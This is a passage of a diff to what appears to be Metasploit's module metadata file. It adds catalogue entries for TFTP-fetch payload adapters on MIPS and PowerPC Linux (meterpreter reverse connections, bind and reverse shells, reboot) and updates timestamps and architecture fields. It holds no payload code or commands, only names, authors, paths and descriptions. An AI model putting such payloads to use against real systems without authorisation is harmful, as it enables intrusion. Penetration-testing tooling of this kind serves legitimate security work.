+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from a TFTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/mipsle/meterpreter_reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/mipsle",
+    "adapted_refname": "linux/mipsle/meterpreter_reverse_https",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/mipsle/meterpreter_reverse_tcp": {
+    "name": "TFTP Fetch",
+    "fullname": "payload/cmd/linux/tftp/mipsle/meterpreter_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from a TFTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/mipsle/meterpreter_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/mipsle",
+    "adapted_refname": "linux/mipsle/meterpreter_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/mipsle/reboot": {
+    "name": "TFTP Fetch, Linux Reboot",
+    "fullname": "payload/cmd/linux/tftp/mipsle/reboot",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Michael Messner <devnull@s3cur1ty.de>",
+      "rigan - <imrigan@gmail.com>"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from a TFTP server.\n\n            A very small shellcode for rebooting the system.\n            This payload is sometimes helpful for testing purposes.",
+    "references": [
+      "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php"
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/mipsle/reboot",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/mipsle",
+    "adapted_refname": "linux/mipsle/reboot",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/mipsle/shell/reverse_tcp": {
+    "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Stager",
+    "fullname": "payload/cmd/linux/tftp/mipsle/shell/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "juan vazquez <juan.vazquez@metasploit.com>",
+      "tkmru"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/mipsle/shell/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/mipsle",
+    "adapted_refname": "linux/mipsle/shell/reverse_tcp",
+    "staged": true,
+    "stage_refname": "linux/mipsle/shell",
+    "stager_refname": "linux/mipsle/reverse_tcp"
+  },
+  "payload_cmd/linux/tftp/mipsle/shell_bind_tcp": {
+    "name": "TFTP Fetch, Linux Command Shell, Bind TCP Inline",
+    "fullname": "payload/cmd/linux/tftp/mipsle/shell_bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "scut",
+      "vaicebine",
+      "Vlatko Kosturjak",
+      "juan vazquez <juan.vazquez@metasploit.com>"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from a TFTP server.\nListen for a connection and spawn a command shell",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/mipsle/shell_bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/mipsle",
+    "adapted_refname": "linux/mipsle/shell_bind_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/mipsle/shell_reverse_tcp": {
+    "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline",
+    "fullname": "payload/cmd/linux/tftp/mipsle/shell_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "rigan <imrigan@gmail.com>",
+      "juan vazquez <juan.vazquez@metasploit.com>"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from a TFTP server.\nConnect back to attacker and spawn a command shell",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/mipsle/shell_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/mipsle",
+    "adapted_refname": "linux/mipsle/shell_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/ppc/meterpreter_reverse_http": {
+    "name": "TFTP Fetch",
+    "fullname": "payload/cmd/linux/tftp/ppc/meterpreter_reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an PPC payload from an TFTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-02-12 15:52:03 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/ppc/meterpreter_reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/ppc",
+    "adapted_refname": "linux/ppc/meterpreter_reverse_http",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/ppc/meterpreter_reverse_https": {
+    "name": "TFTP Fetch",
+    "fullname": "payload/cmd/linux/tftp/ppc/meterpreter_reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an PPC payload from an TFTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-02-12 15:52:03 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/ppc/meterpreter_reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/ppc",
+    "adapted_refname": "linux/ppc/meterpreter_reverse_https",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/ppc/meterpreter_reverse_tcp": {
+    "name": "TFTP Fetch",
+    "fullname": "payload/cmd/linux/tftp/ppc/meterpreter_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an PPC payload from an TFTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-02-12 15:52:03 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/ppc/meterpreter_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/ppc",
+    "adapted_refname": "linux/ppc/meterpreter_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/ppc64/shell_bind_tcp": {
+    "name": "TFTP Fetch, Linux Command Shell, Bind TCP Inline",
+    "fullname": "payload/cmd/linux/tftp/ppc64/shell_bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Ramon de C Valle <rcvalle@metasploit.com>"
+    ],
+    "description": "Fetch and execute an PPC64 payload from a TFTP server.\nListen for a connection and spawn a command shell",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-02-12 15:52:08 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/ppc64/shell_bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/ppc64",
+    "adapted_refname": "linux/ppc64/shell_bind_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/ppc64/shell_find_port": {
+    "name": "TFTP Fetch, Linux Command Shell, Find Port Inline",
+    "fullname": "payload/cmd/linux/tftp/ppc64/shell_find_port",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Ramon de C Valle <rcvalle@metasploit.com>"
+    ],
+    "description": "Fetch and execute an PPC64 payload from a TFTP server.\nSpawn a shell on an established connection",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-02-12 15:52:08 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/ppc64/shell_find_port",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/ppc64",
+    "adapted_refname": "linux/ppc64/shell_find_port",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/ppc64/shell_reverse_tcp": {
+    "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline",
+    "fullname": "payload/cmd/linux/tftp/ppc64/shell_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Ramon de C Valle <rcvalle@metasploit.com>"
+    ],
+    "description": "Fetch and execute an PPC64 payload from a TFTP server.\nConnect back to attacker and spawn a command shell",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-02-12 15:52:08 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/ppc64/shell_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/ppc64",
+    "adapted_refname": "linux/ppc64/shell_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/ppc64le/meterpreter_reverse_http": {
+    "name": "TFTP Fetch",
+    "fullname": "payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute a PPC64LE payload from a TFTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-02-19 18:10:55 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64le.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/ppc64le/meterpreter_reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/ppc64le",
+    "adapted_refname": "linux/ppc64le/meterpreter_reverse_http",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/ppc64le/meterpreter_reverse_https": {
+    "name": "TFTP Fetch",
+    "fullname": "payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute a PPC64LE payload from a TFTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-02-19 18:10:55 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64le.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/ppc64le/meterpreter_reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/ppc64le",
+    "adapted_refname": "linux/ppc64le/meterpreter_reverse_https",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/ppc64le/meterpreter_reverse_tcp": {
+    "name": "TFTP Fetch",
+    "fullname": "payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute a PPC64LE payload from a TFTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-02-19 18:10:55 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64le.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/ppc64le/meterpreter_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/ppc64le",
+    "adapted_refname": "linux/ppc64le/meterpreter_reverse_tcp",
+    "staged": false
+  },
  "payload_cmd/linux/tftp/x64/exec": {
    "name": "TFTP Fetch, Linux Execute Command",
    "fullname": "payload/cmd/linux/tftp/x64/exec",
@@ -236483,7 +243237,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2025-02-12 13:40:34 +0000",
    "path": "/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter/reverse_tcp",
@@ -236635,7 +243389,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2025-02-12 13:40:34 +0000",
    "path": "/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/shell/reverse_tcp",
@@ -236673,7 +243427,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2024-12-20 10:18:25 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/shell_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/shell_reverse_tcp",
@@ -236823,7 +243577,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-07-27 16:02:37 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/shell_bind_tcp",
@@ -236859,7 +243613,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-09-22 12:55:41 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/armle/adduser.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/adduser",
@@ -236895,7 +243649,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-09-22 12:55:41 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/armle/exec.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/exec",
@@ -236932,7 +243686,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/stagers/linux/armle/bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter/bind_tcp",
@@ -236972,7 +243726,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2024-12-18 07:26:37 +0000",
+    "mod_time": "2025-01-23 14:26:44 +0000",
    "path": "/modules/payloads/stagers/linux/armle/reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter/reverse_tcp",
@@ -237124,7 +243878,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/stagers/linux/armle/bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/shell/bind_tcp",
@@ -237163,7 +243917,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2024-12-18 07:26:37 +0000",
+    "mod_time": "2025-01-23 14:26:44 +0000",
    "path": "/modules/payloads/stagers/linux/armle/reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/shell/reverse_tcp",
@@ -237202,7 +243956,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/armle/shell_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/shell_bind_tcp",
@@ -237238,7 +243992,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/shell_reverse_tcp",
@@ -237389,7 +244143,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2024-05-21 12:52:12 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/exec.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/exec",
@@ -237427,7 +244181,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2025-01-15 04:31:53 +0000",
    "path": "/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter/reverse_tcp",
@@ -237580,7 +244334,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/reboot.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/reboot",
@@ -237617,7 +244371,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2025-01-15 04:31:53 +0000",
    "path": "/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/shell/reverse_tcp",
@@ -237658,7 +244412,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/shell_bind_tcp",
@@ -237695,7 +244449,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/shell_reverse_tcp",
@@ -237732,7 +244486,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2024-05-21 12:52:12 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/exec.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/exec",
@@ -237770,7 +244524,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2025-01-15 04:31:53 +0000",
    "path": "/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter/reverse_tcp",
@@ -237923,7 +244677,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/reboot.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/reboot",
@@ -237960,7 +244714,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2025-01-15 04:31:53 +0000",
    "path": "/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/shell/reverse_tcp",
@@ -238001,7 +244755,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/shell_bind_tcp",
@@ -238038,7 +244792,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/shell_reverse_tcp",
@@ -238188,7 +244942,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2024-12-19 12:13:55 +0000",
    "path": "/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/shell_bind_tcp",
@@ -238224,7 +244978,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2024-12-19 12:13:55 +0000",
    "path": "/modules/payloads/singles/linux/ppc/shell_find_port.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/shell_find_port",
@@ -238260,7 +245014,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2024-12-19 12:13:55 +0000",
    "path": "/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/shell_reverse_tcp",
@@ -238291,12 +245045,12 @@

    ],
    "platform": "Linux",
-    "arch": "ppc64, cbea64",
+    "arch": "ppc64",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2025-02-19 17:57:39 +0000",
    "path": "/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64/shell_bind_tcp",
@@ -238327,12 +245081,12 @@

    ],
    "platform": "Linux",
-    "arch": "ppc64, cbea64",
+    "arch": "ppc64",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2025-02-19 17:57:39 +0000",
    "path": "/modules/payloads/singles/linux/ppc64/shell_find_port.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64/shell_find_port",
@@ -238363,12 +245117,12 @@

    ],
    "platform": "Linux",
-    "arch": "ppc64, cbea64",
+    "arch": "ppc64",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2025-02-19 17:57:39 +0000",
    "path": "/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64/shell_reverse_tcp",
@@ -238634,7 +245388,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2024-10-05 00:01:41 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/riscv32le/exec.rb",
    "is_install_path": true,
    "ref_name": "linux/riscv32le/exec",
@@ -238670,7 +245424,7 @@
    "autofilter_ports": null,
